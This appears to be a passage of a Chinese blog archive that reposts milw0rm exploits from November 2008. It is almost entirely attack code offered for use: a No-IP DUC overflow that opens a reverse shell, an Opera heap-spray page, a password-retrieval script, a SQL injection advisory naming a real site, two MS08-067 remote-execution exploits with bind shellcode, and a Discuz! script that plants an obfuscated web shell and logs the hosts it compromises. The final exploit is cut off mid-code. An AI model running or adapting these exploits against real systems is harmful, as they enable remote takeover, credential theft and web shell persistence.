16; custom[i] += (strchr(hexmap, (argv[3][9-(2*i)] >= 0x61)?argv[3][9-(2*i)] - 32:argv[3][9-(2*i)]) - hexmap); } strncpy((char *)&victima[0].offset, (char *)&custom, 4); } port = atoi(argv[2]); if ((port < 0)||(port>65535)) return fprintf(stderr, "ERROR: puerto debe ser >= 1 <= 65535\n"); // sockets servidor / cliente int s, c, len = 16, on = 1; struct sockaddr_in sa, ca; sa.sin_addr.s_addr = 0; sa.sin_port = htons(NOIP_PORT); sa.sin_family = AF_INET; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)); if (bind(s, (struct sockaddr *)&sa, len)) { fprintf(stderr, "ERROR: bind()\n"); exit(-1); } if (listen(s, 5)) { fprintf(stderr, "ERROR: listen()\n"); exit(-1); } // Una IP random cualquiera para forzar el cliente a hacer un update printf("* Esperando que pregunte cual es su IP..."); fflush(stdout); c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len); printf("OK:\n - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port); xploit = (char *)malloc(1024); memset(xploit, 0, 1024); sprintf(xploit, "%s1.2.%d.%d", HTTP_OK, ((getpid() << 16)%254), (getpid()%254)); // Averigua la version del Cliente ver = (char *)malloc(1024); memset(ver, 0, 1024); recv(c, ver, 1024, 0); if (!(ver = strstr(ver, "/2") + 1)) { // User-Agent: Linux-DUC/2.X.X close(c); close(s); return fprintf(stderr, "\nERROR: Veriosn no encontrada\n"); } memset(ver+5, 0, 1); // Busca los offset de esta version for (v = 0; (!argv[3]) && strlen(victima[v].ver); v++) if(!strcmp(victima[v].ver, ver)) break; if (!victima[v].ver) { close(c); close(s); return fprintf(stderr, "\nERROR: Veriosn no encontrada\n"); } send(c, xploit, strlen(xploit), 0); close(c); // Ahora el fuetazo >;) printf("* Preparando Exploit v.s. %s @ ", ver); printf("0x%02x%02x%02x%02x\n", victima[v].offset[3], victima[v].offset[2], victima[v].offset[1], victima[v].offset[0]); // Setea el puerto en el Shellcode shellcode[34] = (char )((port >> 8) & 0xff); shellcode[33] = (char )(port & 0xff); // Setea la IP de retorno en el Shellcode unsigned long backip = (inet_addr(argv[1]) ^ 0xffffffff); *(unsigned long *)(((shellcode)+24)) = (backip); // Prepara el HTTP reply memset(xploit, 0, 1024); sprintf(xploit, "%s<domain =:%s%s", HTTP_OK, guineo, shellcode); // Completa con basura pal' relleno for (i = 0; i < victima[v].padding; i++) strcat(xploit, "\x41"); // Finalmente, trukeame el %EIP strcat(xploit, (char *)&victima[v].offset); printf("* Esperando la conexion de update..."); fflush(stdout); c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len); printf("OK:\n - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port); send(c, xploit, strlen(xploit), 0); close(c); close(s); printf("* Exploit Enviado!!\n\n"); sa.sin_addr.s_addr = 0; sa.sin_port = htons(port); sa.sin_family = AF_INET; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)); if (bind(s, (struct sockaddr *)&sa, len)) { fprintf(stderr, "ERROR: bind()\n"); exit(-1); } if (listen(s, 5)) { fprintf(stderr, "ERROR: listen()\n"); exit(-1); } // Una IP random cualquiera para forzar el cliente a hacer un update &nb sp;printf("* Esperando el shell en %s:%d: ", argv[1], port); fflush(stdout); c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len); // dup2 y NONBLOCK printf("OK:\n - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port); printf("noIPwn3d!!!!\n\n", inet_ntoa(ca.sin_addr), ca.sin_port); revshell(c, inet_ntoa(ca.sin_addr)); close(c); close(s); } // milw0rm.com [2008-11-18]

分类: 矩阵毒刺标签: Exploit

Opera 9.62 file:// Local Heap Overflow Exploit

2008年11月18日 Chinadu 没有评论 39 views

<html> <head><title>uh?</title></head> <body> <script> // k`sOSe 11/15/2008 // tested on Windows XP SP3, opera 9.62 international version // vulnerability found by send9 // there are many ways to achieve code execution, tons of function pointers to overwrite. // maybe there's one more reliable... var i=0; // push es, pop es var block = unescape("%u0607%u0607"); // metasploit WinExec c:\WINDOWS\system32\calc.exe var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100"); while (block.length < 81920) block += block; var memory = new Array(); for (;i<1000;i++) memory[i] += (block + shellcode); var evil = "file://"; for(var i = 0; i<16438; i++) evil += "X"; evil += "R."; window.location.replace(evil); </script> </body> </html> # milw0rm.com [2008-11-17]

分类: 矩阵毒刺标签:

FREEze Greetings 1.0 Remote Password Retrieve Exploit

2008年11月18日 Chinadu 没有评论 40 views

<?php /** * FREEze Greetings 1.0 Remote Password Retrieve Exploit * Exploit by cOndemned * * Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...] * Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8 */ echo <<< Header [~] FREEze Greetings 1.0 Remote Password Retrieve Exploit [~] Exploit by cOndemned [ Prints decoded admin password ] Header; if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n", $argv[0]) and exit; $out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass)) ? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed'; printf("[~] %s \r\n\r\n", $out); ?> # milw0rm.com [2008-11-17]

分类: 矩阵毒刺标签: Exploit

FloSites Blog Multiple Remote SQL Injection Vulnerabilities

2008年11月17日 Chinadu 没有评论 69 views

=========================================================================================== [-] Title : Multiple SQL Injection Vulnerability [-] Software : Flosites Blog [-] Vendor : www.flosites.com [-] Date : 17 November 2008 (Indonesia) [-] Author : Vrs-hCk [-] Contact : d00r[at]telkom.net [-] Blog : http://c0li.blogspot.com/ =========================================================================================== [+] Google Dork "blog by flosites" [+] Exploit http://[site]/[path]/index.php?cat=-1 [SQL]/* http://[site]/[path]/index.php?category=-1 [SQL]/* [+] Proof of Concept http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/* http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/* =========================================================================================== [-] Greetz : www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n, Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ... =========================================================================================== # milw0rm.com [2008-11-16]

分类: 矩阵毒刺标签: Exploit

MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)

2008年11月17日 Chinadu 没有评论 45 views

#!/usr/bin/env python ########################################################### # MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) # www.hackingspirits.com # www.coffeeandsecurity.com # Email: d3basis.m0hanty @ gmail.com ########################################################### import struct import sys from threading import Thread #Thread is imported incase you would like to modify #the src to run against multiple targets. try: from impacket import smb from impacket import uuid from impacket.dcerpc import dcerpc from impacket.dcerpc import transport except ImportError, _: print 'Install the following library to make this script work' print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' sys.exit(1) print '#######################################################################' print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)' print '# www.hackingspirits.com' print '# www.coffeeandsecurity.com' print '# Email: d3basis.m0hanty @ gmail.com' print '#######################################################################\n' #Portbind shellcode from metasploit; Binds port to TCP port 4444 shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" #Payload for Windows 2000 target payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41' payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41' payload_1+='\x41\x41' payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\xeb\xcc' payload_1+='\x00\x00' #Payload for Windows 2003[SP2] target payload_2='\x41\x00\x5c\x00' payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00' payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77' payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00' payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae' payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00' payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43' payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff' payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75' payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5' payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6' payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00' if sys.argv[2]=='1': #Windows 2000 Payload payload=payload_1 print '[-]Windows 2000 payload loaded' if sys.argv[2]=='2': #Windows 2003[SP2] Payload payload=payload_2 print '[-]Windows 2003[SP2] payload loaded' class SRVSVC_Exploit(Thread): def __init__(self, target, osver, port=445): super(SRVSVC_Exploit, self).__init__() self.__port = port self.target = target self.osver = osver def __DCEPacket(self): print '[-]Initiating connection' self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) self.__trans.connect() print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target self.__dce = self.__trans.DCERPC_class(self.__trans) self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) # Constructing Malicious Packet self.__stub='\x01\x00\x00\x00' self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' self.__stub+=shellcode self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' &nb sp; self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x00\x00\x00\x00' self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' self.__stub+=payload self.__stub+='\x00\x00\x00\x00' self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00' self.__stub+='\x01\x00\x00\x00' return def run(self): self.__DCEPacket() self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...' if __name__ == '__main__': try: target = sys.argv[1] osver = sys.argv[2] except IndexError: print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0] print 'Example: srvsvcexpl.py 192.168.1.1 2\n' print 'Select OS Version' print '[-]Windows 2000: OS Version = 1' print '[-]Windows 2003[SP2]: OS Version = 2' sys.exit(-1) current = SRVSVC_Exploit(target, osver) current.start() #print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...' # milw0rm.com [2008-11-16]

分类: 矩阵毒刺标签: Exploit

Discuz! 6.x/7.x SODB-2008-13 Exp（全自动获取SHELL带日志功能）

2008年11月17日 Chinadu 没有评论 82 views

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝Discuz.php＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝ #!/usr/bin/php <?php /** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */ if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; } // $host = 'www.80vul.com'; // 服务器域名或IP // $path = '/'; // 程序所在的路径这些已经由参数获取了，不用麻烦你了…… $host=$argv[1]; $path=$argv[2]; $key = 1; // 上面的变量编辑好后，请将此处的值改为1,已经改好了…… if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1) exit("专业点好不,先看看里面的注释 -,-\n"); error_reporting(7); ini_set('max_execution_time', 0); $key = time(); $cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1'; $resp = send(); preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid); if (!$sid) exit("哦,大概是没有开启WAP注册吧!检测下一个……\n"); $cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}'; send(); $shell = 'http://'.$host.$path.'forumdata/cache/eval.php'; if (file_get_contents($shell) == '80vul') { $filename = "resulturl.txt"; $handle = fopen ($filename,"a+"); //打开文件指针，创建文件 /* 　检查文件是否被创建且可写 */ if (!is_writable ($filename)){ die ("文件：".$filename."不可写，请检查其属性后重试！"); } /*这里写成功了下面的应该没问题，不多检测了*/ if (!fwrite ($handle,$shell)){ //将信息写入文件 die ("生成文件".$filename."失败！"); } fwrite($handle,"\r\n"); fclose ($handle); //关闭指针 exit("\n保存Shell成功!\nWebShell:\t$shell\n"); } else exit("大概是该网站不存在漏洞,换一个吧!\n"); function send() { global $host, $path, $url, $cmd; $data = "POST ".$path."wap/index.php HTTP/1.1\r\n"; $data .= "Accept: */*\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: Close\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n"; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> ＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝END＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

写个批处理就不罗嗦了，前面一个已经说过了……

分类: 矩阵毒刺标签:

SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)

2008年11月16日 Chinadu 没有评论 122 views

* SMBRELAY 3 - NTLM replay attack (version 1.0 ) public version
* (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
* URL: http://tarasco.org/Web/tools.html

http://milw0rm.com/sploits/2008-smbrelay3.zip

# milw0rm.com [2008-11-14]

分类: 矩阵毒刺标签: Exploit

MS Windows Server Service Code Execution Exploit (MS08-067)

2008年11月13日 Chinadu 没有评论 65 views

/* MS08-067 Remote Stack Overflow Vulnerability Exploit Author: Polymorphours Email: Polymorphours@whitecell.org Homepage:http://www.whitecell.org Date: 2008-10-28 */ #include "stdafx.h" #include <winsock2.h> #include <Rpc.h> #include <stdio.h> #include <stdlib.h> #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") #pragma comment(lib, "ws2_32") struct RPCBIND { BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; WORD MaxXmitFrag; WORD MaxRecvFrag; DWORD AssocGroup; BYTE NumCtxItems; WORD ContextID; WORD NumTransItems; GUID InterfaceUUID; WORD InterfaceVerMaj; WORD InterfaceVerMin; GUID TransferSyntax; DWORD SyntaxVer; }; struct RPCFUNC { BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; DWORD AllocHint; WORD ContextID; WORD Opnum; }; BYTE PRPC[0x48] = { 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; BYTE EXPLOIT[] = "\x05\x00" "\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00" "\x00\x00\x00\x00\x1f\x00" "\x00\x00\x00\x00" "\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00" "\x5c\x00" "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" "\x41\x41" "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x12\x45\xfa\x7f" // jmp esp "\x90\x8B\xF4\x81" "\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1" "\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F" // "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41" "\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41" "\x00\x00\x00\x00\x01\x00" "\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00" "\x00\x00" "\x01\x00\x00\x00\x01\x00\x00\x00"; BYTE POP[] =//stub header RPCFUNC structure "\x05\x00" "\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01" "\x00\x00\x00\x00\x1f\x00" "\x00\x00\x00\x00" "\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00" "\x5c\x00" "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41" "\x00\x00\x00\x00\x01\x00" "\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00" "\x00\x00" "\x01\x00\x00\x00\x01\x00\x00\x00"; unsigned char bind_shellcode[] = // "\xCC" // "\x83\xEC\x40" // sub esp, 0x70 "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad" "\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5" "\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1" "\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3" "\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62" "\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1" "\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1" "\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a" "\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a" "\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48" "\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19" "\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab" "\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22" "\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03" "\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d" "\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a" "\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67" "\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5" "\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b" "\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a" "\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a" "\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a"; int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) { BYTE rbuf[0x1000]=""; DWORD dw=0; struct RPCBIND RPCBind; memcpy(&RPCBind,&PRPC,sizeof(RPCBind)); UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID); UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface); RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]); RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]); TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL); return 0; } int main(int argc, char* argv[]) { char *server; NETRESOURCE nr; char unc[MAX_PATH]; &nb sp; char szPipe[MAX_PATH]; HANDLE hFile; WSADATA wsa; int bwritten=0; BYTE rbuf[0x100]=""; DWORD dw; PVOID ptr = (PVOID)&POP; printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" ); printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" ); printf( "Thanks isno and PolyMeta\n" ); printf( "ShellCode Function: bindshell port:4444\n" ); printf( "usage:\n%s [IP]\n", argv[0] ); if ( argc != 2 ) { return 0; } if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) { printf( "WSAStartup failed\n" ); return 0; } memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1); server=argv[1]; _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server); unc[sizeof(unc)-1] = 0; nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpRemoteName = unc; nr.lpProvider = NULL; printf( "connect %s ipc$ .... ", server ); if ( 